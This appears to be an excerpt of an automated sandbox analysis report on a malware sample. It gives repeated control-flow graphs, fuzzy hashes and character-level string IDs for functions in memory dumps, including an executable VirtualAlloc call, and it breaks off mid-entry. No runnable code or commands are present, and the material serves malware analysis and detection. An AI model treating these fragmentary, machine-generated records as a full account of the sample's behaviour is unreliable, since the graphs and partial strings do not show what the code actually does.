                                control_flow_graph 1783 2925623-2925882 1785 2925956-2926010 call 2925cb5 1783->1785 1786 2925888-2925913 1783->1786 1792 2926016-2926268 call 292611a call 2926264 1785->1792 1786->1785 1790 2925915-2925951 1786->1790 1790->1792 1809 292626a-292626d 1792->1809 1810 292626e-2926605 call 292629b call 29265fa 1792->1810 1809->1810 1823 292660b-2926ac1 call 2926780 call 2926a66 1810->1823 1824 2926ed8-2927592 1810->1824 1846 2927598-29279d0 call 29276b6 1823->1846 1824->1846 1854 29282a3-292863d call 29282c4 call 292863f 1846->1854 1855 29279d6-2927e4e 1846->1855 1873 2928963-2928a06 VirtualAlloc 1854->1873 1863 2927e50-2927e8c 1855->1863 1864 2927e91-2927eef 1855->1864 1863->1873 1865 2927f02-2927f17 1864->1865 1866 2927ef1-2927efd 1864->1866 1870 2927f2a-2927f49 1865->1870 1871 2927f19-2927f25 1865->1871 1869 29281c8-29281cf 1866->1869 1869->1854 1878 29281d5-29281f2 call 29281f4 1869->1878 1874 2927f4b-2927f57 1870->1874 1875 2927f5c-2927f6e 1870->1875 1871->1869 1886 2928a08-2928a46 1873->1886 1887 2928a4e-2928ae0 call 2928a7c 1873->1887 1874->1869 1879 2927f70-2927f7c 1875->1879 1880 2927f81-2927fea 1875->1880 1879->1869 1890 2927ff0-2928037 1880->1890 1891 29281bc-29281c2 1880->1891 1886->1887 1899 2928ae2-2928aec 1887->1899 1900 2928af1-2928b16 call 2928b17 1887->1900 1894 2928042-2928050 1890->1894 1895 2928039-292803f 1890->1895 1891->1869 1897 2928056-2928063 1894->1897 1898 29280de-2928129 call 29280f9 1894->1898 1895->1894 1897->1898 1901 2928065-29280b0 1897->1901 1919 2928137-2928188 1898->1919 1920 292812b-2928135 1898->1920 1902 2928d98-2928dd1 1899->1902 1900->1902 1910 29280b2-29280ce 1901->1910 1911 29280d0 1901->1911 1906 2928dd7-2928e97 call 2928e98 1902->1906 1907 29296a4-2929737 1902->1907 1922 2929748-2929793 1907->1922 1923 2929739-2929743 1907->1923 1910->1911 1915 29280d7 1910->1915 1911->1895 1915->1898 1925 2928196 1919->1925 1926 292818a-2928194 1919->1926 1924 29281a0-29281a7 1920->1924 1928 29297a4-29298aa call 2929820 call 29298ac 1922->1928 1929 2929795-292979f 1922->1929 1927 29299ef-2929a7f call 2929a0f 1923->1927 1932 29281b7 1924->1932 1933 29281a9-29281b5 1924->1933 1925->1924 1926->1924 1939 2929a92-2929aa7 1927->1939 1940 2929a81-2929a8d 1927->1940 1928->1927 1929->1927 1932->1869 1933->1869 1943 2929aba-2929ad9 1939->1943 1944 2929aa9-2929ab5 1939->1944 1942 2929d58-2929d86 VirtualFree 1940->1942 1952 2929dd0-2929e0e 1942->1952 1953 2929d88-2929daa 1942->1953 1947 2929adb-2929ae7 1943->1947 1948 2929aec-2929afe 1943->1948 1944->1942 1947->1942 1949 2929b00-2929b0c 1948->1949 1950 2929b11-2929b7a 1948->1950 1949->1942 1956 2929b80-2929be0 1950->1956 1957 2929d4c-2929d52 1950->1957 1955 2929e16-2929e20 1952->1955 1953->1952 1960 2929dac-2929dce 1953->1960 1961 2929be6-2929bf3 1956->1961 1962 2929c6e-2929c94 call 2929c95 1956->1962 1957->1942 1960->1952 1960->1955 1961->1962 1963 2929bf5-2929c2a call 2929c1d 1961->1963 1962->1957 1963->1962
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$E$F$L$L$L$L$P$S$V$V$W$W$[W$a$a$a$a$a$a$b$b$c$c$d$d$e$e$e$i$i$i$i$i$l$l$l$l$o$o$o$o$r$r$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y$y
                                • API String ID: 0-2002451845
                                • Opcode ID: 9553e75a72e40f26fe79fd54f2cf19ddf64e684f6323868e429e79f9732920fe
                                • Instruction ID: 4f4550d3098ad6facbbf37dc2b042d28c06d46ec2f96581196765d2ff6dc4269
                                • Opcode Fuzzy Hash: 9553e75a72e40f26fe79fd54f2cf19ddf64e684f6323868e429e79f9732920fe
                                • Instruction Fuzzy Hash: BA52D7A1D182A49AF7218A24DC44BEBBB79EF91304F0480F9D54CA7685D67E0FC5CF62
                                Function 02925C52 Relevance: 92.2, APIs: 1, Strings: 60, Instructions: 731COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1970 2925c52-2925c85 1971 2925c97-2926268 call 2925cb5 call 292611a call 2926264 1970->1971 1972 2925c87-2925c91 1970->1972 1990 292626a-292626d 1971->1990 1991 292626e-2926605 call 292629b call 29265fa 1971->1991 1972->1971 1990->1991 2004 292660b-2926ac1 call 2926780 call 2926a66 1991->2004 2005 2926ed8-2927592 1991->2005 2027 2927598-29279d0 call 29276b6 2004->2027 2005->2027 2035 29282a3-292863d call 29282c4 call 292863f 2027->2035 2036 29279d6-2927e4e 2027->2036 2054 2928963-2928a06 VirtualAlloc 2035->2054 2044 2927e50-2927e8c 2036->2044 2045 2927e91-2927eef 2036->2045 2044->2054 2046 2927f02-2927f17 2045->2046 2047 2927ef1-2927efd 2045->2047 2051 2927f2a-2927f49 2046->2051 2052 2927f19-2927f25 2046->2052 2050 29281c8-29281cf 2047->2050 2050->2035 2059 29281d5-29281f2 call 29281f4 2050->2059 2055 2927f4b-2927f57 2051->2055 2056 2927f5c-2927f6e 2051->2056 2052->2050 2067 2928a08-2928a46 2054->2067 2068 2928a4e-2928ae0 call 2928a7c 2054->2068 2055->2050 2060 2927f70-2927f7c 2056->2060 2061 2927f81-2927fea 2056->2061 2060->2050 2071 2927ff0-2928037 2061->2071 2072 29281bc-29281c2 2061->2072 2067->2068 2080 2928ae2-2928aec 2068->2080 2081 2928af1-2928b16 call 2928b17 2068->2081 2075 2928042-2928050 2071->2075 2076 2928039-292803f 2071->2076 2072->2050 2078 2928056-2928063 2075->2078 2079 29280de-2928129 call 29280f9 2075->2079 2076->2075 2078->2079 2082 2928065-29280b0 2078->2082 2100 2928137-2928188 2079->2100 2101 292812b-2928135 2079->2101 2083 2928d98-2928dd1 2080->2083 2081->2083 2091 29280b2-29280ce 2082->2091 2092 29280d0 2082->2092 2087 2928dd7-2928e97 call 2928e98 2083->2087 2088 29296a4-2929737 2083->2088 2103 2929748-2929793 2088->2103 2104 2929739-2929743 2088->2104 2091->2092 2096 29280d7 2091->2096 2092->2076 2096->2079 2106 2928196 2100->2106 2107 292818a-2928194 2100->2107 2105 29281a0-29281a7 2101->2105 2109 29297a4-29298aa call 2929820 call 29298ac 2103->2109 2110 2929795-292979f 2103->2110 2108 29299ef-2929a7f call 2929a0f 2104->2108 2113 29281b7 2105->2113 2114 29281a9-29281b5 2105->2114 2106->2105 2107->2105 2120 2929a92-2929aa7 2108->2120 2121 2929a81-2929a8d 2108->2121 2109->2108 2110->2108 2113->2050 2114->2050 2124 2929aba-2929ad9 2120->2124 2125 2929aa9-2929ab5 2120->2125 2123 2929d58-2929d86 VirtualFree 2121->2123 2133 2929dd0-2929e0e 2123->2133 2134 2929d88-2929daa 2123->2134 2128 2929adb-2929ae7 2124->2128 2129 2929aec-2929afe 2124->2129 2125->2123 2128->2123 2130 2929b00-2929b0c 2129->2130 2131 2929b11-2929b7a 2129->2131 2130->2123 2137 2929b80-2929be0 2131->2137 2138 2929d4c-2929d52 2131->2138 2136 2929e16-2929e20 2133->2136 2134->2133 2141 2929dac-2929dce 2134->2141 2142 2929be6-2929bf3 2137->2142 2143 2929c6e-2929c94 call 2929c95 2137->2143 2138->2123 2141->2133 2141->2136 2142->2143 2144 2929bf5-2929c2a call 2929c1d 2142->2144 2143->2138 2144->2143
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$E$F$L$L$L$L$P$S$V$V$W$W$[W$a$a$a$a$a$a$b$b$c$c$d$d$e$e$e$i$i$i$i$i$l$l$l$l$o$o$o$o$r$r$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y$y
                                • API String ID: 0-2002451845
                                • Opcode ID: 38dff1ae8c2d2d53c5591eb9686cd7c5c85d21a4621ec7c6753db7981aa2ffdd
                                • Instruction ID: d049ab8625e116ce85a4081235ebdfd08116d339f1c6c5ddbdafd06911673f2c
                                • Opcode Fuzzy Hash: 38dff1ae8c2d2d53c5591eb9686cd7c5c85d21a4621ec7c6753db7981aa2ffdd
                                • Instruction Fuzzy Hash: FE52C6A1D182A48AF721CA24DC44BEABB79EF91304F0481F9D44CA7685D67E4FC5CF62
                                Function 02925C16 Relevance: 92.2, APIs: 1, Strings: 60, Instructions: 727COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2331 2925c16-2926268 call 2925cb5 call 292611a call 2926264 2350 292626a-292626d 2331->2350 2351 292626e-2926605 call 292629b call 29265fa 2331->2351 2350->2351 2364 292660b-2926ac1 call 2926780 call 2926a66 2351->2364 2365 2926ed8-2927592 2351->2365 2387 2927598-29279d0 call 29276b6 2364->2387 2365->2387 2395 29282a3-292863d call 29282c4 call 292863f 2387->2395 2396 29279d6-2927e4e 2387->2396 2414 2928963-2928a06 VirtualAlloc 2395->2414 2404 2927e50-2927e8c 2396->2404 2405 2927e91-2927eef 2396->2405 2404->2414 2406 2927f02-2927f17 2405->2406 2407 2927ef1-2927efd 2405->2407 2411 2927f2a-2927f49 2406->2411 2412 2927f19-2927f25 2406->2412 2410 29281c8-29281cf 2407->2410 2410->2395 2419 29281d5-29281f2 call 29281f4 2410->2419 2415 2927f4b-2927f57 2411->2415 2416 2927f5c-2927f6e 2411->2416 2412->2410 2427 2928a08-2928a46 2414->2427 2428 2928a4e-2928ae0 call 2928a7c 2414->2428 2415->2410 2420 2927f70-2927f7c 2416->2420 2421 2927f81-2927fea 2416->2421 2420->2410 2431 2927ff0-2928037 2421->2431 2432 29281bc-29281c2 2421->2432 2427->2428 2440 2928ae2-2928aec 2428->2440 2441 2928af1-2928b16 call 2928b17 2428->2441 2435 2928042-2928050 2431->2435 2436 2928039-292803f 2431->2436 2432->2410 2438 2928056-2928063 2435->2438 2439 29280de-2928129 call 29280f9 2435->2439 2436->2435 2438->2439 2442 2928065-29280b0 2438->2442 2460 2928137-2928188 2439->2460 2461 292812b-2928135 2439->2461 2443 2928d98-2928dd1 2440->2443 2441->2443 2451 29280b2-29280ce 2442->2451 2452 29280d0 2442->2452 2447 2928dd7-2928e97 call 2928e98 2443->2447 2448 29296a4-2929737 2443->2448 2463 2929748-2929793 2448->2463 2464 2929739-2929743 2448->2464 2451->2452 2456 29280d7 2451->2456 2452->2436 2456->2439 2466 2928196 2460->2466 2467 292818a-2928194 2460->2467 2465 29281a0-29281a7 2461->2465 2469 29297a4-29298aa call 2929820 call 29298ac 2463->2469 2470 2929795-292979f 2463->2470 2468 29299ef-2929a7f call 2929a0f 2464->2468 2473 29281b7 2465->2473 2474 29281a9-29281b5 2465->2474 2466->2465 2467->2465 2480 2929a92-2929aa7 2468->2480 2481 2929a81-2929a8d 2468->2481 2469->2468 2470->2468 2473->2410 2474->2410 2484 2929aba-2929ad9 2480->2484 2485 2929aa9-2929ab5 2480->2485 2483 2929d58-2929d86 VirtualFree 2481->2483 2493 2929dd0-2929e0e 2483->2493 2494 2929d88-2929daa 2483->2494 2488 2929adb-2929ae7 2484->2488 2489 2929aec-2929afe 2484->2489 2485->2483 2488->2483 2490 2929b00-2929b0c 2489->2490 2491 2929b11-2929b7a 2489->2491 2490->2483 2497 2929b80-2929be0 2491->2497 2498 2929d4c-2929d52 2491->2498 2496 2929e16-2929e20 2493->2496 2494->2493 2501 2929dac-2929dce 2494->2501 2502 2929be6-2929bf3 2497->2502 2503 2929c6e-2929c94 call 2929c95 2497->2503 2498->2483 2501->2493 2501->2496 2502->2503 2504 2929bf5-2929c2a call 2929c1d 2502->2504 2503->2498 2504->2503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$E$F$L$L$L$L$P$S$V$V$W$W$[W$a$a$a$a$a$a$b$b$c$c$d$d$e$e$e$i$i$i$i$i$l$l$l$l$o$o$o$o$r$r$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y$y
                                • API String ID: 0-2002451845
                                • Opcode ID: 4bc22e3322805561acadf19387d55b21212e7b66c78b3151f9d96d6719b9f659
                                • Instruction ID: 18d7276ada5326199ec5b465c65509de2e02cb9d3ee4b67567631c1be8eb9f55
                                • Opcode Fuzzy Hash: 4bc22e3322805561acadf19387d55b21212e7b66c78b3151f9d96d6719b9f659
                                • Instruction Fuzzy Hash: 1552E7A1D182A48AF721CA24DC44BEABB79EF91304F0481F9D44CA7685D67E4FC5CF62
                                Function 02925A21 Relevance: 92.2, APIs: 1, Strings: 60, Instructions: 727COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2151 2925a21-2926268 call 2925cb5 call 292611a call 2926264 2170 292626a-292626d 2151->2170 2171 292626e-2926605 call 292629b call 29265fa 2151->2171 2170->2171 2184 292660b-2926ac1 call 2926780 call 2926a66 2171->2184 2185 2926ed8-2927592 2171->2185 2207 2927598-29279d0 call 29276b6 2184->2207 2185->2207 2215 29282a3-292863d call 29282c4 call 292863f 2207->2215 2216 29279d6-2927e4e 2207->2216 2234 2928963-2928a06 VirtualAlloc 2215->2234 2224 2927e50-2927e8c 2216->2224 2225 2927e91-2927eef 2216->2225 2224->2234 2226 2927f02-2927f17 2225->2226 2227 2927ef1-2927efd 2225->2227 2231 2927f2a-2927f49 2226->2231 2232 2927f19-2927f25 2226->2232 2230 29281c8-29281cf 2227->2230 2230->2215 2239 29281d5-29281f2 call 29281f4 2230->2239 2235 2927f4b-2927f57 2231->2235 2236 2927f5c-2927f6e 2231->2236 2232->2230 2247 2928a08-2928a46 2234->2247 2248 2928a4e-2928ae0 call 2928a7c 2234->2248 2235->2230 2240 2927f70-2927f7c 2236->2240 2241 2927f81-2927fea 2236->2241 2240->2230 2251 2927ff0-2928037 2241->2251 2252 29281bc-29281c2 2241->2252 2247->2248 2260 2928ae2-2928aec 2248->2260 2261 2928af1-2928b16 call 2928b17 2248->2261 2255 2928042-2928050 2251->2255 2256 2928039-292803f 2251->2256 2252->2230 2258 2928056-2928063 2255->2258 2259 29280de-2928129 call 29280f9 2255->2259 2256->2255 2258->2259 2262 2928065-29280b0 2258->2262 2280 2928137-2928188 2259->2280 2281 292812b-2928135 2259->2281 2263 2928d98-2928dd1 2260->2263 2261->2263 2271 29280b2-29280ce 2262->2271 2272 29280d0 2262->2272 2267 2928dd7-2928e97 call 2928e98 2263->2267 2268 29296a4-2929737 2263->2268 2283 2929748-2929793 2268->2283 2284 2929739-2929743 2268->2284 2271->2272 2276 29280d7 2271->2276 2272->2256 2276->2259 2286 2928196 2280->2286 2287 292818a-2928194 2280->2287 2285 29281a0-29281a7 2281->2285 2289 29297a4-29298aa call 2929820 call 29298ac 2283->2289 2290 2929795-292979f 2283->2290 2288 29299ef-2929a7f call 2929a0f 2284->2288 2293 29281b7 2285->2293 2294 29281a9-29281b5 2285->2294 2286->2285 2287->2285 2300 2929a92-2929aa7 2288->2300 2301 2929a81-2929a8d 2288->2301 2289->2288 2290->2288 2293->2230 2294->2230 2304 2929aba-2929ad9 2300->2304 2305 2929aa9-2929ab5 2300->2305 2303 2929d58-2929d86 VirtualFree 2301->2303 2313 2929dd0-2929e0e 2303->2313 2314 2929d88-2929daa 2303->2314 2308 2929adb-2929ae7 2304->2308 2309 2929aec-2929afe 2304->2309 2305->2303 2308->2303 2310 2929b00-2929b0c 2309->2310 2311 2929b11-2929b7a 2309->2311 2310->2303 2317 2929b80-2929be0 2311->2317 2318 2929d4c-2929d52 2311->2318 2316 2929e16-2929e20 2313->2316 2314->2313 2321 2929dac-2929dce 2314->2321 2322 2929be6-2929bf3 2317->2322 2323 2929c6e-2929c94 call 2929c95 2317->2323 2318->2303 2321->2313 2321->2316 2322->2323 2324 2929bf5-2929c2a call 2929c1d 2322->2324 2323->2318 2324->2323
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$E$F$L$L$L$L$P$S$V$V$W$W$[W$a$a$a$a$a$a$b$b$c$c$d$d$e$e$e$i$i$i$i$i$l$l$l$l$o$o$o$o$r$r$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y$y
                                • API String ID: 0-2002451845
                                • Opcode ID: 616ac1a679ac117a84ece365be3a50b9897d6d4325b405e82581b447ebcf87a2
                                • Instruction ID: 9657fb59a4dd9ff48890ea055077c99d280af15e8ed45d92b5102886f5de7381
                                • Opcode Fuzzy Hash: 616ac1a679ac117a84ece365be3a50b9897d6d4325b405e82581b447ebcf87a2
                                • Instruction Fuzzy Hash: BA52E8A1D182A48AF721CA24DC44BEABB79EF91304F0480F9D44CA7685D67E4FC5CF62
                                Function 02925C27 Relevance: 92.2, APIs: 1, Strings: 60, Instructions: 721COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2511 2925c27-2926268 call 2925cb5 call 292611a call 2926264 2530 292626a-292626d 2511->2530 2531 292626e-2926605 call 292629b call 29265fa 2511->2531 2530->2531 2544 292660b-2926ac1 call 2926780 call 2926a66 2531->2544 2545 2926ed8-2927592 2531->2545 2567 2927598-29279d0 call 29276b6 2544->2567 2545->2567 2575 29282a3-292863d call 29282c4 call 292863f 2567->2575 2576 29279d6-2927e4e 2567->2576 2594 2928963-2928a06 VirtualAlloc 2575->2594 2584 2927e50-2927e8c 2576->2584 2585 2927e91-2927eef 2576->2585 2584->2594 2586 2927f02-2927f17 2585->2586 2587 2927ef1-2927efd 2585->2587 2591 2927f2a-2927f49 2586->2591 2592 2927f19-2927f25 2586->2592 2590 29281c8-29281cf 2587->2590 2590->2575 2599 29281d5-29281f2 call 29281f4 2590->2599 2595 2927f4b-2927f57 2591->2595 2596 2927f5c-2927f6e 2591->2596 2592->2590 2607 2928a08-2928a46 2594->2607 2608 2928a4e-2928ae0 call 2928a7c 2594->2608 2595->2590 2600 2927f70-2927f7c 2596->2600 2601 2927f81-2927fea 2596->2601 2600->2590 2611 2927ff0-2928037 2601->2611 2612 29281bc-29281c2 2601->2612 2607->2608 2620 2928ae2-2928aec 2608->2620 2621 2928af1-2928b16 call 2928b17 2608->2621 2615 2928042-2928050 2611->2615 2616 2928039-292803f 2611->2616 2612->2590 2618 2928056-2928063 2615->2618 2619 29280de-2928129 call 29280f9 2615->2619 2616->2615 2618->2619 2622 2928065-29280b0 2618->2622 2640 2928137-2928188 2619->2640 2641 292812b-2928135 2619->2641 2623 2928d98-2928dd1 2620->2623 2621->2623 2631 29280b2-29280ce 2622->2631 2632 29280d0 2622->2632 2627 2928dd7-2928e97 call 2928e98 2623->2627 2628 29296a4-2929737 2623->2628 2643 2929748-2929793 2628->2643 2644 2929739-2929743 2628->2644 2631->2632 2636 29280d7 2631->2636 2632->2616 2636->2619 2646 2928196 2640->2646 2647 292818a-2928194 2640->2647 2645 29281a0-29281a7 2641->2645 2649 29297a4-29298aa call 2929820 call 29298ac 2643->2649 2650 2929795-292979f 2643->2650 2648 29299ef-2929a7f call 2929a0f 2644->2648 2653 29281b7 2645->2653 2654 29281a9-29281b5 2645->2654 2646->2645 2647->2645 2660 2929a92-2929aa7 2648->2660 2661 2929a81-2929a8d 2648->2661 2649->2648 2650->2648 2653->2590 2654->2590 2664 2929aba-2929ad9 2660->2664 2665 2929aa9-2929ab5 2660->2665 2663 2929d58-2929d86 VirtualFree 2661->2663 2673 2929dd0-2929e0e 2663->2673 2674 2929d88-2929daa 2663->2674 2668 2929adb-2929ae7 2664->2668 2669 2929aec-2929afe 2664->2669 2665->2663 2668->2663 2670 2929b00-2929b0c 2669->2670 2671 2929b11-2929b7a 2669->2671 2670->2663 2677 2929b80-2929be0 2671->2677 2678 2929d4c-2929d52 2671->2678 2676 2929e16-2929e20 2673->2676 2674->2673 2681 2929dac-2929dce 2674->2681 2682 2929be6-2929bf3 2677->2682 2683 2929c6e-2929c94 call 2929c95 2677->2683 2678->2663 2681->2673 2681->2676 2682->2683 2684 2929bf5-2929c2a call 2929c1d 2682->2684 2683->2678 2684->2683
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$E$F$L$L$L$L$P$S$V$V$W$W$[W$a$a$a$a$a$a$b$b$c$c$d$d$e$e$e$i$i$i$i$i$l$l$l$l$o$o$o$o$r$r$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y$y
                                • API String ID: 0-2002451845
                                • Opcode ID: 52fd370e9416cd9ebd96abc48bb0425fb7c5b7acc313a5de1e36997f93dde7ec
                                • Instruction ID: 9491a70b1233604e2deaa2c99dcc5d79f53f00a4163003823ff0b6bebd313340
                                • Opcode Fuzzy Hash: 52fd370e9416cd9ebd96abc48bb0425fb7c5b7acc313a5de1e36997f93dde7ec
                                • Instruction Fuzzy Hash: DD52E7A1D182A48AF721CA24DC44BEABB79EF91304F0481F9D44CA7685D67E4FC5CF62
                                Function 02925CC6 Relevance: 92.2, APIs: 1, Strings: 60, Instructions: 703COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2691 2925cc6-2926268 call 292611a call 2926264 2704 292626a-292626d 2691->2704 2705 292626e-2926605 call 292629b call 29265fa 2691->2705 2704->2705 2718 292660b-2926ac1 call 2926780 call 2926a66 2705->2718 2719 2926ed8-2927592 2705->2719 2741 2927598-29279d0 call 29276b6 2718->2741 2719->2741 2749 29282a3-292863d call 29282c4 call 292863f 2741->2749 2750 29279d6-2927e4e 2741->2750 2768 2928963-2928a06 VirtualAlloc 2749->2768 2758 2927e50-2927e8c 2750->2758 2759 2927e91-2927eef 2750->2759 2758->2768 2760 2927f02-2927f17 2759->2760 2761 2927ef1-2927efd 2759->2761 2765 2927f2a-2927f49 2760->2765 2766 2927f19-2927f25 2760->2766 2764 29281c8-29281cf 2761->2764 2764->2749 2773 29281d5-29281f2 call 29281f4 2764->2773 2769 2927f4b-2927f57 2765->2769 2770 2927f5c-2927f6e 2765->2770 2766->2764 2781 2928a08-2928a46 2768->2781 2782 2928a4e-2928ae0 call 2928a7c 2768->2782 2769->2764 2774 2927f70-2927f7c 2770->2774 2775 2927f81-2927fea 2770->2775 2774->2764 2785 2927ff0-2928037 2775->2785 2786 29281bc-29281c2 2775->2786 2781->2782 2794 2928ae2-2928aec 2782->2794 2795 2928af1-2928b16 call 2928b17 2782->2795 2789 2928042-2928050 2785->2789 2790 2928039-292803f 2785->2790 2786->2764 2792 2928056-2928063 2789->2792 2793 29280de-2928129 call 29280f9 2789->2793 2790->2789 2792->2793 2796 2928065-29280b0 2792->2796 2814 2928137-2928188 2793->2814 2815 292812b-2928135 2793->2815 2797 2928d98-2928dd1 2794->2797 2795->2797 2805 29280b2-29280ce 2796->2805 2806 29280d0 2796->2806 2801 2928dd7-2928e97 call 2928e98 2797->2801 2802 29296a4-2929737 2797->2802 2817 2929748-2929793 2802->2817 2818 2929739-2929743 2802->2818 2805->2806 2810 29280d7 2805->2810 2806->2790 2810->2793 2820 2928196 2814->2820 2821 292818a-2928194 2814->2821 2819 29281a0-29281a7 2815->2819 2823 29297a4-29298aa call 2929820 call 29298ac 2817->2823 2824 2929795-292979f 2817->2824 2822 29299ef-2929a7f call 2929a0f 2818->2822 2827 29281b7 2819->2827 2828 29281a9-29281b5 2819->2828 2820->2819 2821->2819 2834 2929a92-2929aa7 2822->2834 2835 2929a81-2929a8d 2822->2835 2823->2822 2824->2822 2827->2764 2828->2764 2838 2929aba-2929ad9 2834->2838 2839 2929aa9-2929ab5 2834->2839 2837 2929d58-2929d86 VirtualFree 2835->2837 2847 2929dd0-2929e0e 2837->2847 2848 2929d88-2929daa 2837->2848 2842 2929adb-2929ae7 2838->2842 2843 2929aec-2929afe 2838->2843 2839->2837 2842->2837 2844 2929b00-2929b0c 2843->2844 2845 2929b11-2929b7a 2843->2845 2844->2837 2851 2929b80-2929be0 2845->2851 2852 2929d4c-2929d52 2845->2852 2850 2929e16-2929e20 2847->2850 2848->2847 2855 2929dac-2929dce 2848->2855 2856 2929be6-2929bf3 2851->2856 2857 2929c6e-2929c94 call 2929c95 2851->2857 2852->2837 2855->2847 2855->2850 2856->2857 2858 2929bf5-2929c2a call 2929c1d 2856->2858 2857->2852 2858->2857
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$E$F$L$L$L$L$P$S$V$V$W$W$[W$a$a$a$a$a$a$b$b$c$c$d$d$e$e$e$i$i$i$i$i$l$l$l$l$o$o$o$o$r$r$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y$y
                                • API String ID: 0-2002451845
                                • Opcode ID: e327ca36f441c44643adde14fc122138cb157187e31d5bc173bc09c7d14b2767
                                • Instruction ID: 39c82b8ae8fe7c09f9d4590152defbe7385e10e76922b27453465a8b78648935
                                • Opcode Fuzzy Hash: e327ca36f441c44643adde14fc122138cb157187e31d5bc173bc09c7d14b2767
                                • Instruction Fuzzy Hash: 2952D8A1D182A48AF721CA24DC44BEABB79EF91304F0481F9D44CA7685D67E4FC5CF62
                                Function 029619B6 Relevance: 56.5, APIs: 1, Strings: 31, Instructions: 524COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$6I@6$F2=:$HI82$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2045030226
                                • Opcode ID: 04b3c225d15d2598a2ba00971e6e8a82b29d66233df6064145ebc1d337a52b19
                                • Instruction ID: d4a0d279a450ff8911638313efacce6c364cc0dc6f18a584c9b198c0dafa6515
                                • Opcode Fuzzy Hash: 04b3c225d15d2598a2ba00971e6e8a82b29d66233df6064145ebc1d337a52b19
                                • Instruction Fuzzy Hash: AA2207B1D052A48BE720CB24DC587EA7BB5EF95310F0441FAC44D67281D67A5EC6CFA2
                                Function 029617E3 Relevance: 56.5, APIs: 1, Strings: 31, Instructions: 499COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$6I@6$F2=:$HI82$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2045030226
                                • Opcode ID: dce7da7ef0f55c8298e165c15a218728c63676c08bfa291e3ff01c29150f2276
                                • Instruction ID: 2103fffe1a853379da3b579409311210e368e4e68e9a3f42ac0acb380f9fc47f
                                • Opcode Fuzzy Hash: dce7da7ef0f55c8298e165c15a218728c63676c08bfa291e3ff01c29150f2276
                                • Instruction Fuzzy Hash: 1A1228B1D092A48AE720CB24DC587EA7BB5EF91310F0441FAC44D67281D67A4FD6CFA2
                                Function 0296DC17 Relevance: 56.0, APIs: 1, Strings: 36, Instructions: 512memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0296F35A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: E$L$L$L$L$P$W$W$a$a$a$a$b$b$c$d$d$e$i$i$i$j@h$o$o$o$r$r$r$r$r$s$s$t$x$y$y
                                • API String ID: 4275171209-572641038
                                • Opcode ID: 19555410c92eae7b4f59360e2c593c7c58fd660cfd34fd1e31098275a1338e3b
                                • Instruction ID: 552fa3b961e2e50e235a39b545459134c218602d4d65801ceac1638d9d3a8645
